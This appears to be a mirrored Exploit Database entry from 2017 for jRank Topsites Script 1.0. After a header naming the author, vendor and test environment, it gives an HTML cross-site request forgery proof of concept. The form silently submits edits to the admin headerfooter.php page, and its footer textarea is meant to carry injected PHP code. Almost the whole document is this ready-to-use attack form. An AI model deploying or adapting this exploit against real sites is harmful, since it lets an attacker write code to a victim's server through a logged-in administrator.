Topsites Script 1.0 – Cross-Site Request Forgery / PHP Code Injection

• Exploit Database
• 14 阅读

• 作者： Ihsan Sencan
  日期： 2017-09-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42644/

• <!--
  # # # # # 
  # Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery
  # Dork: N/A
  # Date: 10.09.2017
  # Vendor Homepage: https://topsitesscript.com/
  # Software Link: https://topsitesscript.com/topsites-script-demo/
  # Demo: http://www.topsitesscript.com/demo/
  # Version: 1.0
  # Category: Webapps
  # Tested on: WiN7_x64/KaLiLinuX_x64
  # CVE: N/A
  # # # # #
  # Exploit Author: Ihsan Sencan
  # Author Web: http://ihsan.net
  # Author Social: @ihsansencan
  # # # # #
  -->
  <form action="http://localhost/[PATH]/admin/headerfooter.php" method="post">
  <input name="action" value="edit" type="hidden">
  <table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
  <tbody>
  <tr bgcolor="#3498DB">
  <td><b style="color:#FFFFFF;">Meta Tags File</b></td>
  </tr>
  <tr bgcolor="#FFFFFF">
  <td>
  <textarea cols="10" rows="2" name="meta" style="width: 100%">
  <!-- 
  Html Code etc.....
  -->
  </textarea>
  </td>
  </tr>
  </tbody>
  </table>
  <table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
  <tbody>
  <tr bgcolor="#3498DB">
  <td><b style="color:#FFFFFF;">Footer File</b></td>
  </tr>
  <tr bgcolor="#FFFFFF">
  <td><textarea cols="60" rows="7" name="footer" style="width: 100%">
  <!--
  Php Code etc.....
  -->
  </textarea>
  </td>
  </tr>
  <tr bgcolor="#FFFFFF">
  <td>
  <font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font>
  </td>
  </tr>
  </tbody>
  </table>
  </form>